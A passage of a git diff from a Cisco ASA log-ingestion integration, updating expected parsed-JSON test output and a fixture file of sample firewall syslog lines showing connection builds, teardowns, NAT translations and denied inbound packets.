- "original": "Oct 20 2019 15:42:53: %ASA-4-113019: Group = TheBeatles, Username = John, IP = 234.28.45.42, Session disconnected. Session Type: SSL, Duration: 2h:27m:34s, Bytes xmt: 45323434, Bytes rcv: 43252324, Reason: Idle Timeout",
+ "ingested": "2021-12-09T13:33:41.556916700Z",
+ "original": "Oct 20 2019 15:42:53: %ASA-4-113019: Group = TheBeatles, Username = John, IP = 67.43.156.12, Session disconnected. Session Type: SSL, Duration: 2h:27m:34s, Bytes xmt: 45323434, Bytes rcv: 43252324, Reason: Idle Timeout",
 "code": "113019",
 "kind": "event",
 "start": "2019-10-20T13:15:19.000Z",
@@ -139,7 +139,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-11T11:16:23.841954400Z",
+ "ingested": "2021-12-09T13:33:41.556922600Z",
 "original": "Oct 20 2019 15:42:54: %ASA-4-722037: Group \u003cGroupPolicy_TheBeatles\u003e User \u003cPaul\u003e IP \u003c83.212.241.149\u003e SVC closing connection: DPD failure.",
 "code": "722037",
 "kind": "event",
@@ -173,7 +173,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-11T11:16:23.841961900Z",
+ "ingested": "2021-12-09T13:33:41.556928400Z",
 "original": "Aug 6 2020 11:01:37: %ASA-4-722037: Group \u003cGroupPolicy_TheBeatles\u003e User \u003cBrian\u003e IP \u003c234.63.56.32\u003e SVC closing connection: Transport closing.",
 "code": "722037",
 "kind": "event",
@@ -207,7 +207,7 @@
 "George"
 ],
 "ip": [
- "234.24.156.94"
+ "67.43.156.12"
 ]
 },
 "log": {
@@ -217,13 +217,13 @@
 "user": {
 "name": "George"
 },
- "address": "234.24.156.94",
- "ip": "234.24.156.94"
+ "address": "67.43.156.12",
+ "ip": "67.43.156.12"
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-11T11:16:23.841969400Z",
- "original": "Aug 6 2020 11:01:38: %ASA-4-722051: Group \u003cGroupPolicy_TheBeatles\u003e User \u003cGeorge\u003e IP \u003c234.24.156.94\u003e IPv4 Address \u003c234.56.47.98\u003e IPv6 address \u003c::\u003e assigned to session",
+ "ingested": "2021-12-09T13:33:41.556934300Z",
+ "original": "Aug 6 2020 11:01:38: %ASA-4-722051: Group \u003cGroupPolicy_TheBeatles\u003e User \u003cGeorge\u003e IP \u003c67.43.156.12\u003e IPv4 Address \u003c67.43.156.12\u003e IPv6 address \u003c::\u003e assigned to session",
 "code": "722051",
 "kind": "event",
 "action": "firewall-rule",
@@ -239,7 +239,7 @@
 "webvpn": {
 "group_name": "GroupPolicy_TheBeatles"
 },
- "assigned_ip": "234.56.47.98"
+ "assigned_ip": "67.43.156.12"
 }
 },
 "tags": [
diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log
index 9f0a0b8b598..5d21ffa5a9f 100644
--- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log
+++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log
@@ -1,268 +1,268 @@ -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:100.66.98.44/8256 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:100.66.205.104/80 (100.66.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:100.66.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:100.66.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:100.66.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:100.66.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:100.66.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:100.66.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:100.66.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:100.66.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for 
outside:100.66.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:100.66.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:100.66.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:100.66.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:100.66.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:100.66.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:100.66.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:100.66.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:100.66.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1188 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:100.66.80.32/53 (100.66.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost 
CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:100.66.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:100.66.252.6/53 (100.66.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:100.66.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:100.66.98.44/8257 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:100.66.98.44/8258 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:100.66.238.126/53 (100.66.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:100.66.93.51/53 (100.66.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:100.66.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:100.66.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237 -Oct 10 2018 12:34:56 localhost 
CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:100.66.98.44/8259 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:100.66.225.103/443 (100.66.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1189 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:100.66.240.126/53 (100.66.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:100.66.44.45/53 (100.66.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:100.66.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:100.66.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:100.66.98.44/8265 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:100.66.179.219/80 (100.66.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:100.66.157.232/53 (100.66.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:100.66.178.133/53 (100.66.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost 
CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:100.66.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:100.66.98.44/8266 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:100.66.133.112/80 (100.66.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:100.66.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:100.66.204.197/53 (100.66.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:100.66.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 
11781 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:100.66.1.107/53 (100.66.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:100.66.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from 
inside:172.31.98.44/1459 to outside:100.66.98.44/8272 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:100.66.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:100.66.192.44/80 (100.66.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:100.66.98.44/8277 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:100.66.19.254/80 (100.66.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271 duration 0:00:30 -Oct 10 2018 12:34:56 
localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:100.66.98.44/8272 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:100.66.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:100.66.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:100.66.98.44/8278 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:100.66.115.46/80 (100.66.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst 
inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:100.66.98.44/8279 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1190 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:100.66.14.30/53 (100.66.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP 
connection 11800 for outside:100.66.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:100.66.252.210/53 (100.66.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:100.66.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:100.66.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:100.66.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from 
inside:172.31.98.44/1279 to outside:100.66.98.44/8283
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:100.66.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:100.66.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:100.66.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287
-Oct 10 
2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:100.66.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:100.66.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:100.66.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:100.66.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs
-Oct 10 2018 12:34:56 localhost 
CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:100.66.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:100.66.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs
